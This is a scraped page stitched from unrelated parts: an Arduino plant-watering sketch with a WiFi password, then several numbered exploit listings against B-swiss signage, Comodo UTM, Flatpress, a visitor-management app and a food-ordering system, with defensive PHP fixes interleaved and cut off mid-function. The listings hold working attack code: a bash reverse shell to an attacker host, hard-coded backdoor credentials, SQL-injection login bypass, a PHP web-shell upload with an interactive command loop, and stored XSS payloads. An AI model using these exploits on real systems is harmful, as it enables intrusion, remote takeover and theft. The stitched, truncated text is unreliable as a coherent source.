#define DHTPIN 4              // DHT11 module connected to io4 (D2 pin)
#define DHTTYPE DHT11         // Use the DHT11 temperature and humidity module; other DHTs can be substituted

int soilValue;      // Raw soil sensor reading
int soilMoisture;   // Soil moisture in percent

char auth[] = "1c2ce3eef946";   // Device key from the Blinker app
char ssid[] = "PDCN";            // WiFi name to connect to
char pswd[] = "1234567890";      // WiFi password

BlinkerNumber HUMI("humi");     // Humidity data key name
BlinkerNumber TEMP("temp");     // Temperature data key name
BlinkerNumber TEMP2("temp2");   // Soil moisture data key name

DHT dht(DHTPIN, DHTTYPE);             // DHT instance
float humi_read = 0, temp_read = 0;   // Last valid sensor readings

// Dashboard components
void heartbeat()
{
    HUMI.print(humi_read);      // Send humidity data back to the Blinker app
    TEMP.print(temp_read);      // Send temperature data back to the Blinker app
    TEMP2.print(soilMoisture);  // Send soil moisture back to the Blinker app
    if (soilMoisture < 50)      // Soil moisture below 50%: run the pump
    {
        digitalWrite(CS, LOW);  // Energise the relay (the relay is idle HIGH, see setup())
    }
    else
    {
        digitalWrite(CS, HIGH); // Release the relay
    }
}

// Real-time curve chart component
void dataStorage()
{
    Blinker.dataStorage("temp", temp_read);
    Blinker.dataStorage("humi", humi_read);
    Blinker.dataStorage("humi2", soilMoisture);
}

// Return the data to Xiao AI
void miotQuery(int32_t queryCode)
{
    BLINKER_LOG("MIOT Query codes: ", queryCode);
    int humi_read_int = humi_read;      // Convert float to int
    BlinkerMIOT.humi(humi_read_int);    // Xiao AI receives humidity
    BlinkerMIOT.temp(temp_read);        // Xiao AI receives temperature
    BlinkerMIOT.print();
}

void setup()
{
    // Initialise the serial port and enable debug output
    Serial.begin(9600);                         // Baud rate
    BLINKER_DEBUG.stream(Serial);
    BLINKER_DEBUG.debugAll();
    Blinker.begin(auth, ssid, pswd);            // WiFi initialisation settings
    Blinker.attachHeartbeat(heartbeat);         // Register dashboard
    dht.begin();
    BlinkerMIOT.attachQuery(miotQuery);         // Register Xiao AI
    Blinker.attachDataStorage(dataStorage);     // Register real-time curve
    pinMode(LED_BUILTIN, OUTPUT);
    digitalWrite(LED_BUILTIN, 1);
    pinMode(CS, OUTPUT);                        // Initialise the relay pin
    digitalWrite(CS, HIGH);                     // Relay off at start
}

void loop()
{
    Blinker.run();   // Processes the data received by Blinker; parses the device's received data once per call (important)
    float h = dht.readHumidity();       // Read the humidity collected by the DHT11
    float t = dht.readTemperature();    // Read the temperature collected by the DHT11
    if (isnan(h) || isnan(t))           // Check whether the readings are valid
    {
        BLINKER_LOG("Reading sensor data failed");
    }
    else
    {
        BLINKER_LOG("Humidity: ", h, " %");     // Print debug information
        BLINKER_LOG("Temperature: ", t, " *C");
        humi_read = h;
        temp_read = t;
    }
    soilValue = analogRead(soilPin);                  // Raw soil value 0-1024
    soilMoisture = map(soilValue, 0, 1023, 100, 0);   // Convert 0-1024 to 100%-0; the sensor reads 1024 in open air
    Blinker.delay(200);   // Delay that keeps the device connected and processes received data while waiting
}

Effect

When the humidity is less than 50%, the relay automatically works.

When the soil moisture is higher than 50%, the relay stops working.

Of course, the above code only completes the corresponding functions. There may be certain shortcomings. You can modify it yourself according to your actual situation.
19. # Exploit Title: B-swiss 3 Digital Signage System 3.6.5 - Remote Code Execution
# Date: 2020-08-27
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.b-swiss.com
# Version: <= 3.6.5
# CVE : N/A

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# B-swiss 3 Digital Signage System 3.6.5 Backdoor Remote Code Execution
#
#
# Vendor: B-Swiss SARL | b-tween Sarl
# Product web page: https://www.b-swiss.com
# Affected version: 3.6.5
#                   3.6.2
#                   3.6.1
#                   3.6.0
#                   3.5.80
#                   3.5.40
#                   3.5.20
#                   3.5.00
#                   3.2.00
#                   3.1.00
#
# Summary: Intelligent digital signage made easy. To go beyond the
# possibilities offered, b-swiss allows you to create the communication
# solution for your specific needs and your graphic charter. You benefit
# from our experience and know-how in the realization of your digital
# signage project.
#
# Desc: The application suffers from an "authenticated" arbitrary
# PHP code execution. The vulnerability is caused due to the improper
# verification of uploaded files in 'index.php' script thru the 'rec_poza'
# POST parameter. This can be exploited to execute arbitrary PHP code
# by uploading a malicious PHP script file that will be stored in
# '/usr/users' directory. Due to an undocumented and hidden "maintenance"
# account 'admin_m' which has the highest privileges in the application,
# an attacker can use these hard-coded credentials to authenticate and
# use the vulnerable image upload functionality to execute code on the
# server.
#
# ========================================================================================
# lqwrm@metalgear:~/prive$ python3 sign2.py 192.168.10.11 192.168.10.22 7777
# [*] Checking target...
# [*] Good to go!
# [*] Checking for previous attempts...
# [*] All good.
# [*] Getting backdoor session...
# [*] Got master backdoor cookie: 0c1617103c6f50107d09cb94b3eafeb2
# [*] Starting callback listener child thread
# [*] Starting handler on port 7777
# [*] Adding GUI credentials: test:123456
# [*] Executing and deleting stager file
# [*] Connection from 192.168.10.11:40080
# [*] You got shell!
# id ; uname -or
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
# 4.15.0-20-generic GNU/Linux
# exit
# *** Connection closed by remote host ***
# [?] Want me to remove the GUI credentials? y
# [*] Removing...
# [*] t00t!
# lqwrm@metalgear:~/prive$
# ========================================================================================
#
# Tested on: Linux 5.3.0-46-generic x86_64
#            Linux 4.15.0-20-generic x86_64
#            Linux 4.9.78-xxxx-std-ipv6-64
#            Linux 4.7.0-040700-generic x86_64
#            Linux 4.2.0-27-generic x86_64
#            Linux 3.19.0-47-generic x86_64
#            Linux 2.6.32-5-amd64 x86_64
#            Darwin 17.6.0 root:xnu-4570.61.1~1 x86_64
#            macOS 10.13.5
#            Microsoft Windows 7 Business Edition SP1 i586
#            Apache/2.4.29 (Ubuntu)
#            Apache/2.4.18 (Ubuntu)
#            Apache/2.4.7 (Ubuntu)
#            Apache/2.2.22 (Win64)
#            Apache/2.4.18 (Ubuntu)
#            Apache/2.2.16 (Debian)
#            PHP/7.2.24-0ubuntu0.18.04.6
#            PHP/5.6.40-26+ubuntu18.04.1+deb.sury.org+1
#            PHP/5.6.33-1+ubuntu16.04.1+deb.sury.org+1
#            PHP/5.6.31
#            PHP/5.6.30-10+deb.sury.org~xenial+2
#            PHP/5.5.9-1ubuntu4.17
#            PHP/5.5.9-1ubuntu4.14
#            PHP/5.3.10
#            PHP/5.3.13
#            PHP/5.3.3-7+squeeze16
#            PHP/5.3.3-7+squeeze17
#            MySQL/5.5.49
#            MySQL/5.5.47
#            MySQL/5.5.40
#            MySQL/5.5.30
#            MySQL/5.1.66
#            MySQL/5.1.49
#            MySQL/5.0.77
#            MySQL/5.0.12-dev
#            MySQL/5.0.11-dev
#            MySQL/5.0.8-dev
#            phpMyAdmin/3.5.7
#            phpMyAdmin/3.4.10.1deb1
#            phpMyAdmin/3.4.7
#            phpMyAdmin/3.3.7deb7
#            WampServer 3.2.0
#            Acore Framework 2.0
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             Macedonian Information Security Research and Development Laboratory
#                             Zero Science Lab - https://www.zeroscience.mk - @zeroscience
#
#
# Advisory ID: ZSL-2020-5590
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5590.php
#
#
# 13.06.2020
#

from http.cookiejar import DefaultCookiePolicy#                                      #yciloPeikooCtluafeD tropmi rajeikooc.ptth mofr
from http.cookiejar import CookieJar#                         oOo                    #raJeikooC tropmi rajeikooc.ptth mofr
from six.moves import input#                   #-----------------+-----------------# #tupni trompi sevom.xis morf
from time import sleep#                        |        01       |        04       | #peels trompi emit morf
import urllib.request#                         |        |        |        |        | #tseuqer.billru tropmi
import urllib.parse#                           |        |        |        |        | #esrap.billru tropmi
import telnetlib#                              |        |        |        |          #biltenlet tropmi
import threading#                              |        |        |        |        | #gnidaerht tropmi
import requests#                               |        |        |        |        | #stseuqer tropmi
import socket#                                 |        |        o        |        | #tekcos tropmi
import sys,re#                                 |        |        |                 | #er,sys tropmi
##############                                 #-----------------+-----------------# ##############
###############                                               oOo                   ###############
################                                               |                   ################
####################                                           Y               ####################
############################                                   _           ############################
###############################################################################################

class Sign:
    def __init__(self):
        self.username = b"\x61\x64\x6d\x69\x6e\x5f\x6d"
        self.altruser = b"\x62\x2d\x73\x77\x69\x73\x73"
        self.password = b"\x44\x50\x36\x25\x57\x33\x64"
        self.agent = "SignageBot/1.02"
        self.fileid = "251"
        self.payload = None
        self.answer = False
        self.params = None
        self.rhost = None
        self.lhost = None
        self.lport = None
        self.send = None

    def env(self):
        if len(sys.argv) != 4:
            self.usage()
        else:
            self.rhost = sys.argv[1]
            self.lhost = sys.argv[2]
            self.lport = int(sys.argv[3])
            if not "http" in self.rhost:
                self.rhost = "http://{}".format(self.rhost)

    def usage(self):
        self.roger()
        print("Usage: python3 {} <RHOST[:RPORT]> <LHOST> <LPORT>".format(sys.argv[0]))
        print("Example: python3 {} 192.168.10.11:80 192.168.10.22 7777\n".format(sys.argv[0]))
        exit(0)

    def roger(self):
        waddup = """
         ____________________
        /                    \\
        !  B-swiss 3         !
        !        RCE         !
        \____________________/
               !  !
               !  !
               L_ !
              / _)!
             / /__L
       _____/ (____)
              (____)
       _____  (____)
            \_(____)
               !  !
               !  !
               \__/
        """
        print(waddup)

    def test(self):
        print("[*] Checking target...")
        try:
            r = requests.get(self.rhost)
            response = r.text
            if not "B-swiss" in response:
                print("[!] Not a b-swiss system")
                exit(0)
            if "B-swiss" in response:
                print("[*] Good to go!")
                next
            else:
                exit(-251)
        except Exception as e:
            print("[!] Ney ney: {msg}".format(msg=e))
            exit(-1)

    def login(self):
        token = ""
        cj = CookieJar()
        self.params = {"locator" : "visitor.ProcessLogin",
                       "username" : self.username,
                       "password" : self.password,
                       "x" : "0",
                       "y" : "0"}
        damato = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
        damato.addheaders.pop()
        damato.addheaders.append(("User-Agent", self.agent))
        try:
            print("[*] Getting backdoor session...")
            damato.open(self.rhost + "/index.php", urllib.parse.urlencode(self.params).encode('utf-8'))
            for cookie in cj:
                token = cookie.value
                print("[*] Got master backdoor cookie: "+token)
        except urllib.request.URLError as e:
            print("[!] Connection error: {}".format(e.reason))
        return token

    def upload(self):
        j = "\r\n"
        self.cookies = {"PNU_RAD_LIB" : self.rtoken}
        self.headers = {"Cache-Control" : "max-age=0",
                        "Content-Type" : "multipart/form-data; boundary=----j",
                        "User-Agent" : self.agent,
                        "Accept-Encoding" : "gzip, deflate",
                        "Accept-Language" : "en-US,en;q=0.9",
                        "Connection" : "close"}
        self.payload = "<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/"+self.lhost+"/"+str(self.lport)+" <&1;rm "+self.fileid+".php'\");"
        print("[*] Adding GUI credentials: test:123456")
        # rec_adminlevel values:
        # ----------------------
        # 100000 - "b-swiss Maintenance Admin" (Undocumented privilege)
        # 7      - "B-swiss admin" <---------------------------------------------------------------------------------------+
        # 8      - Other                                                                                                   |
        #                                                                                                                  |
        self.send = "------j{}Content-Disposition: form-data; ".format(j)#                                                 |
        self.send += "name=\"locator\"{}Users.Save{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)#            |
        self.send += "name=\"page\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)#                             |
        self.send += "name=\"sort\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)#                             |
        self.send += "name=\"id\"{}{}{}------j\r\nContent-Disposition: form-data; ".format(j*2,self.fileid,j,j)#           |
        self.send += "name=\"ischildgrid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)#                      |
        self.send += "name=\"inpopup\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)#                          |
        self.send += "name=\"ongridpage\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)#                       |
        self.send += "name=\"rowid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)#                            |
        self.send += "name=\"preview_screenid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)#                 |
        self.send += "name=\"rec_firstname\"{}TestF{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)#           |
        self.send += "name=\"rec_lastname\"{}TestL{}------j{}Content-Disposition: form-data; ".format(j*2,j,2)#            |
        self.send += "name=\"rec_email\"{}test@test.cc{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)#        |
        self.send += "name=\"rec_username\"{}test{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)#             |
        self.send += "name=\"rec_password\"{}123456{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)#           |
        self.send += "name=\"rec_cpassword\"{}123456{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)#          |
        self.send += "name=\"rec_adminlevel\"{}7{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# <----------+
        self.send += "name=\"rec_status\"{}1{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)
        self.send += "name=\"rec_poza\"; filename=\"Blank.jpg.php\"{}Content-Type: application/octet-stream{}".format(j,j*2)
        self.send += self.payload+"{}------j{}Content-Disposition: form-data; ".format(j,j)
        self.send += "name=\"rec_poza_face\"{}C:\\fakepath\\Blank.jpg{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)
        self.send += "name=\"rec_language\"{}french-sw{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)
        self.send += "name=\"rec_languages[]\"{}2{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)
        self.send += "name=\"rec_can_change_password\"{}1{}------j--{}".format(j*2,j,j)
        requests.post(self.rhost+"/index.php", headers=self.headers, cookies=self.cookies, data=self.send)
        print("[*] Executing and deleting stager file")
        r = requests.get(self.rhost+"/usr/users/"+self.fileid+".php")
        sleep(1)
        self.answer = input("[?] Want me to remove the GUI credentials? 
").strip() if self.answer[0] == "y" or self.answer[0] == "Y": print("[*] Removing...") requests.get(self.rhost+"/index.php?locator=Users.Delete&id="+self.fileid, headers=self.headers, cookies=self.cookies) if self.answer[0] == "n" or self.answer[0] == "N": print("[*] Cool!") print("[*] t00t!") exit(-1) def razmisluju(self): print("[*] Starting callback listener child thread") konac = threading.Thread(name="ZSL", target=self.phone) konac.start() sleep(1) self.upload() def fish(self): r = requests.get(self.rhost+"/usr/users/", verify=False, allow_redirects=False) response = r.text print("[*] Checking for previous attempts...") if not ".php" in response: print("[*] All good.") elif "251.php" in response: print("[!] Stager file \"{}.php\" still present on the server".format(self.fileid)) def phone(self): telnetus = telnetlib.Telnet() print("[*] Starting handler on port {}".format(self.lport)) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(("0.0.0.0", self.lport)) while True: try: s.settimeout(7) s.listen(1) conn, addr = s.accept() print("[*] Connection from {}:{}".format(addr[0], addr[1])) telnetus.sock = conn except socket.timeout as p: print("[!] No outgoing calls :( ({msg})".format(msg=p)) print("[+] Check your port mappings or increase timeout") s.close() exit(0) break print("[*] You got shell!") telnetus.interact() conn.close() def main(self): self.env() self.test() self.fish() self.rtoken = self.login() self.razmisluju() if __name__ == '__main__': Sign().main()
  20. # Exploit Title: Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution
# Date: 2018-08-15
# Exploit Author: Milad Fadavvi
# Author's LinkedIn: https://www.linkedin.com/in/fadavvi/
# Vendor Homepage: https://www.comodo.com/
# Version: Releases before 2.7.0 & 1.5.0
# Tested on: Windows=Firefox/chrome - Kali=firefox
# PoC & other infos: https://github.com/Fadavvi/CVE-2018-17431-PoC
# CVE : CVE-2018-17431
# CVE details: https://nvd.nist.gov/vuln/detail/CVE-2018-17431
# CVSS 3 score: 9.8

import requests


def RndInt(Lenght):
    # Random digit string of the requested length, used for the filler parameters
    from random import choice
    from string import digits
    RandonInt = ''.join([choice(digits) for n in range(Lenght)])
    return str(RandonInt)


if __name__ == "__main__":
    IP = input("IP: ")
    Port = input("Port: ")
    Command = '%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a'  ## Disable SSH
    '''For more info about the command, read the manual of the specific version of Comodo UTM
    and the exploit PoC (https://github.com/Fadavvi/CVE-2018-17431-PoC)'''
    BaseURL = "https://" + IP + ":" + Port + "/manage/webshell/u?s=" + RndInt(1) + "&w=" + RndInt(3) + "&h=" + RndInt(2)
    BaseNComdURL = BaseURL + "&k=" + Command
    LastPart = "&l=" + RndInt(2) + "&_=" + RndInt(13)
    FullURL = BaseNComdURL + LastPart
    AddetionalEnter = BaseURL + "&k=%0a" + LastPart
    try:
        FirstResponse = requests.get(FullURL).text
    except:
        print('\nExploit failed due to HTTP error. Check the given URL and port!\n')
        exit(1)
    SecondResponse = requests.get(AddetionalEnter).text
    if SecondResponse.find("Configuration has been altered") == -1:
        print("\nExploit Failed!\n")
        exit(1)
    else:
        print("\nOK! Command Ran!\n")
        exit(0)
  21. # Exploit Title: Flatpress Add Blog 1.0.3 - Persistent Cross-Site Scripting
# Date: 2020-09-19
# Exploit Author: Alperen Ergel
# Vendor Homepage: https://www.flatpress.org/
# Software Link: https://github.com/evacchi/flatpress/releases/tag/v1.0.3
# Version: 1.0.3
# Tested on: windows 10 / xampp
# CVE : CVE-2020-35241

# Proof of Concept

POST /flatpress/admin.php?p=entry&action=write HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 223
Origin: http://localhost/
Connection: close
Referer: http://localhost/flatpress/admin.php?p=entry&action=write
Cookie: fpuser_fp-a53f4609=opensourcecms; fppass_fp-a53f4609=79dc9a3c529fcd0d9dc4fc7ff22187b6; fpsess_fp-a53f4609=71v18tu3lsc0s021q2pj8a3je7; _ga=GA1.2.487908813.1600520069; _gid=GA1.2.951134816.1600520069; _gat=1
Upgrade-Insecure-Requests: 1

_wpnonce=4fc4222db1&_wp_http_referer=%2Fflatpress%2Fadmin.php%3Fp%3Dentry%26action%3Dwrite&subject=XSS&timestamp=1600526382&entry=entry200919-143942&attachselect=--&imageselect=--&content=<img src=x onerror='alert("TEST XSS")'/>&savecontinue=Save%26Continue

# Snippet

content=[PAYLOAD]   // <img src=x onerror='alert("TEST XSS")'/>
  22. # Title: Visitor Management System in PHP 1.0 - Persistent Cross-Site Scripting
# Exploit Author: Rahul Ramkumar
# Date: 2020-09-16
# Vendor Homepage: https://projectworlds.in
# Software Link: https://projectworlds.in/wp-content/uploads/2020/07/Visitor-Management-System-in-PHP.zip
# Version: 1.0
# Tested On: Windows 10 Enterprise 1809 (x64_86) + XAMPP 7.2.33-1
# CVE: N/A
# Description: The file myform.php does not perform input validation on the request parameters. An attacker can inject javascript payloads in the parameters to perform various attacks such as stealing of cookies, sensitive information etc.

import requests, sys, urllib, re
from lxml import etree
from io import StringIO
from colorama import Fore, Back, Style
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
import random
import string


def print_usage(STRING):
    return Style.BRIGHT + Fore.YELLOW + STRING + Fore.RESET


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(print_usage("Usage:\t\t python %s <WEBAPP_URL>" % sys.argv[0]))
        print(print_usage("Example:\t python %s 'https://192.168.1.72:443/visitor_management/'" % sys.argv[0]))
        sys.exit(-1)

    SERVER_URL = sys.argv[1]
    XSS_DIR = '/myform.php'
    XSS_URL = SERVER_URL + XSS_DIR
    XSS_PoC_URL = SERVER_URL + '/front.php'

    s = requests.Session()
    s.get(SERVER_URL, verify=False)

    # Submit the visitor form with the script payload in the comment field
    payload = {'name': 'd3crypt', 'cno': '9876543210', 'purpose': 'stored xss', 'MeetingTo': 'Hack',
               'comment': '<script>alert("xss")</script>', 'submit_post': 'Submit', 'mydata': ''}
    r1 = s.post(url=XSS_URL, data=payload, verify=False)

    # Fetch the listing page and locate the record that was just stored
    r2 = s.get(XSS_PoC_URL, allow_redirects=False, verify=False)
    response_page = r2.content.decode("utf-8")
    parser = etree.HTMLParser()
    tree = etree.parse(StringIO(response_page), parser=parser)

    def get_links(tree):
        refs = tree.xpath("//a")
        links = [link.get('data-content', '') for link in refs]
        return [l for l in links]

    visitors = get_links(tree)
    #print(visitors)
    for visitor in visitors:
        if 'stored xss' in visitor:
            rid = visitor.split(':')[6].strip()
            print(print_usage('Make the logged-in user click this URL: ' + XSS_PoC_URL + '?rid=' + rid))
  23. # Exploit Title: Simple Online Food Ordering System 1.0 - 'id' SQL Injection (Unauthenticated)
# Google Dork: N/A
# Date: 2020-09-22
# Exploit Author: Eren 'Aporlorxl23' Şimşek
# Vendor Homepage: https://www.sourcecodester.com/php/14460/simple-online-food-ordering-system-using-phpmysql.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-online-food-ordering-system-using-php.zip
# Version: 1.0
# Tested on: Linux - XAMPP Server
# CVE : N/A

# Vulnerable Source Code:
# /view_prod.php
# [3] $qry = $conn->query("SELECT * FROM product_list where id = ".$_GET['id'])->fetch_array();

# PoC:

# Request:

GET /view_prod.php?id=' HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: tr,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close

# Response:

HTTP/1.1 200 OK
Date: Tue, 22 Sep 2020 20:44:48 GMT
Server: Apache/2.4.43 (Unix) OpenSSL/1.1.1g PHP/7.4.7 mod_perl/2.0.11 Perl/v5.30.3
X-Powered-By: PHP/7.4.7
Content-Length: 234
Connection: close
Content-Type: text/html; charset=UTF-8

<br />
<b>Fatal error</b>: Uncaught Error: Call to a member function fetch_array() on bool in /opt/lampp/htdocs/view_prod.php:3
Stack trace:
#0 {main}
thrown in <b>/opt/lampp/htdocs/view_prod.php</b> on line <b>3</b><br />

# As you can see here, PHP raises a fatal error because
# $qry = $conn->query("SELECT * FROM product_list where id = "')->fetch_array();
# the id value ' is wrong syntax.
# Recommended Fix: use `mysqli_real_escape_string` on id, and the query will be the same as:
# $qry = $conn->query('SELECT * FROM product_list where id ="$_GET['id']"')->fetch_array();
# because here "" is not used; this is important.
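The vulnerable line quoted above concatenates `$_GET['id']` into the SQL text, which is why a lone `'` produces the fatal error in the response. The following is an added example, not code from the project: the quoted line beside a parameterised replacement, written as a defender would patch `view_prod.php`. `$conn` is assumed to be an open `mysqli` connection; the function names and the connection parameters in the usage comment are placeholders.

```php
<?php
// Added example, not the project's code: the vulnerable line from view_prod.php beside a
// parameterised replacement. $conn is assumed to be an open mysqli connection.

// Vulnerable, as quoted in the post: $_GET['id'] is concatenated into the SQL text.
// A value of ' breaks the statement; a crafted value would change its meaning instead.
function view_product_vulnerable(mysqli $conn): ?array {
    $qry = $conn->query("SELECT * FROM product_list where id = " . $_GET['id'])->fetch_array();
    return $qry ?: null;
}

// Hardened: validate the type first, then bind the value as a parameter so the database
// never parses it as SQL. An escaping function only helps when the value sits inside a
// quoted string literal; a bound parameter needs neither quoting nor escaping.
function view_product_safe(mysqli $conn, $raw_id): ?array {
    $id = filter_var($raw_id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);   // not a product id at all: refuse rather than query
        return null;
    }
    $stmt = $conn->prepare("SELECT * FROM product_list WHERE id = ?");
    $stmt->bind_param("i", $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// The response in the post also leaks the script path through a PHP fatal error.
// Turn mysqli failures into exceptions so they can be caught, and keep error detail
// out of the HTTP response (log it server-side instead).
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// Usage with assumed connection parameters:
// $conn = new mysqli('localhost', 'dbuser', 'dbpass', 'fos_db');
// $product = view_product_safe($conn, $_GET['id'] ?? null);
```

With `display_errors` off, the probe request in the post returns an empty page instead of the stack trace, which removes the error-based feedback that confirms the injection point.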
  24. # Exploit Title: Online Food Ordering System 1.0 - Remote Code Execution
# Google Dork: N/A
# Date: 2020-09-22
# Exploit Author: Eren Şimşek
# Vendor Homepage: https://www.sourcecodester.com/php/14460/simple-online-food-ordering-system-using-phpmysql.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-online-food-ordering-system-using-php.zip
# Version: 1.0
# Tested on: Windows/Linux - XAMPP Server
# CVE : N/A
# Setup: pip3 install bs4 html5lib

# Exploit Code :

import requests, sys, string, random
from bs4 import BeautifulSoup


def get_random_string(length):
    letters = string.ascii_lowercase
    result_str = ''.join(random.choice(letters) for i in range(length))
    return result_str


session = requests.session()
Domain = ""
RandomFileName = get_random_string(5) + ".php"


def Help():
    print("[?] Usage: python AporlorRCE.py <Domain>")


def Upload():
    # Save a menu item whose image field carries the PHP file
    session = requests.session()
    burp0_url = Domain + "/admin/ajax.php?action=save_menu"
    burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0",
                     "Accept": "*/*",
                     "Accept-Language": "tr,en-US;q=0.7,en;q=0.3",
                     "Accept-Encoding": "gzip, deflate",
                     "Referer": "http://localhost/fos/admin/index.php?page=menu",
                     "X-Requested-With": "XMLHttpRequest",
                     "Content-Type": "multipart/form-data; boundary=---------------------------21991269520298699981411767018",
                     "Connection": "close"}
    burp0_data = (
        "-----------------------------21991269520298699981411767018\r\n"
        "Content-Disposition: form-data; name=\"id\"\r\n\r\n\r\n"
        "-----------------------------21991269520298699981411767018\r\n"
        "Content-Disposition: form-data; name=\"name\"\r\n\r\nRCE\r\n"
        "-----------------------------21991269520298699981411767018\r\n"
        "Content-Disposition: form-data; name=\"description\"\r\n\r\nRCE\r\n"
        "-----------------------------21991269520298699981411767018\r\n"
        "Content-Disposition: form-data; name=\"status\"\r\n\r\non\r\n"
        "-----------------------------21991269520298699981411767018\r\n"
        "Content-Disposition: form-data; name=\"category_id\"\r\n\r\n3\r\n"
        "-----------------------------21991269520298699981411767018\r\n"
        "Content-Disposition: form-data; name=\"price\"\r\n\r\n1\r\n"
        "-----------------------------21991269520298699981411767018\r\n"
        "Content-Disposition: form-data; name=\"img\"; filename=\"" + RandomFileName + "\"\r\n"
        "Content-Type: application/x-php\r\n\r\n"
        "<?php system($_GET['cmd']); ?>\n\r\n"
        "-----------------------------21991269520298699981411767018--\r\n"
    )
    try:
        Resp = session.post(burp0_url, headers=burp0_headers, data=burp0_data)
        if Resp.text == "1":
            print("[+] Shell Upload Success")
        else:
            print("[-] Shell Upload Failed")
    except:
        print("[-] Request Failed")
        Help()


def Login():
    # Authentication bypass through the login form
    burp0_url = Domain + "/admin/ajax.php?action=login"
    burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0",
                     "Accept": "*/*",
                     "Accept-Language": "tr,en-US;q=0.7,en;q=0.3",
                     "Accept-Encoding": "gzip, deflate",
                     "Referer": "http://localhost/fos/admin/login.php",
                     "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
                     "X-Requested-With": "XMLHttpRequest",
                     "Connection": "close"}
    burp0_data = {"username": "' OR 1=1 #", "password": "' OR 1=1 #"}
    try:
        Resp = session.post(burp0_url, headers=burp0_headers, data=burp0_data)
        if Resp.text == "1":
            print("[+] Login Success")
        else:
            print("[+] Login Failed")
    except:
        print("[-] Request Failed")
        Help()


def FoundMyRCE():
    # Find the stored file name by scanning the <img> tags on the menu page
    global FileName
    burp0_url = Domain + "/admin/index.php?page=menu"
    burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0",
                     "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
                     "Accept-Language": "tr,en-US;q=0.7,en;q=0.3",
                     "Accept-Encoding": "gzip, deflate",
                     "Connection": "close",
                     "Upgrade-Insecure-Requests": "1"}
    try:
        Resp = session.get(burp0_url, headers=burp0_headers)
        Soup = BeautifulSoup(Resp.text, "html5lib")
        Data = Soup.find_all("img")
        for MyRCE in Data:
            if RandomFileName in MyRCE["src"]:
                # take the last path component; str.strip() would remove characters, not a prefix
                FileName = MyRCE["src"].split("/")[-1]
                print("[+] Found File Name: " + FileName)
    except:
        print("[-] Request Failed")
        Help()


def Terminal():
    while True:
        Command = input("Console: ")
        burp0_url = Domain + "/assets/img/" + FileName + "?cmd=" + Command
        try:
            Resp = session.get(burp0_url)
            print(Resp.text)
        except KeyboardInterrupt:
            print("[+] KeyboardInterrupt Stop, Thanks For Use Aporlorxl23")
        except:
            print("[-] Request Error")


if __name__ == "__main__":
    if len(sys.argv) == 2:
        Domain = sys.argv[1]
        Login()
        Upload()
        FoundMyRCE()
        Terminal()
    else:
        Help()
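Both the B-swiss post above (a profile picture named `Blank.jpg.php` sent as `application/octet-stream`) and this Online Food Ordering post (a menu image field carrying a `.php` file declared as `application/x-php`) rely on an upload handler that keeps the client's file name and trusts the client's content type. The following is an added example, not code from either project: an image upload handler that rejects both cases and stores files where they cannot execute. The field name `img`, the `uploads` directory and the function names are assumptions.

```php
<?php
// Added example, not code from B-swiss or the Online Food Ordering System: an image upload
// handler that rejects a ".jpg.php" name and a PHP body declared as an image.
// Field name "img", the uploads directory and the function names are assumptions.

const UPLOAD_DIR = __DIR__ . '/../uploads';   // assumed: a directory outside the web root
const ALLOWED = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif'];
const MAX_BYTES = 2 * 1024 * 1024;

// Returns the stored file name, or throws with the reason the upload was refused.
function store_image(array $file): string {
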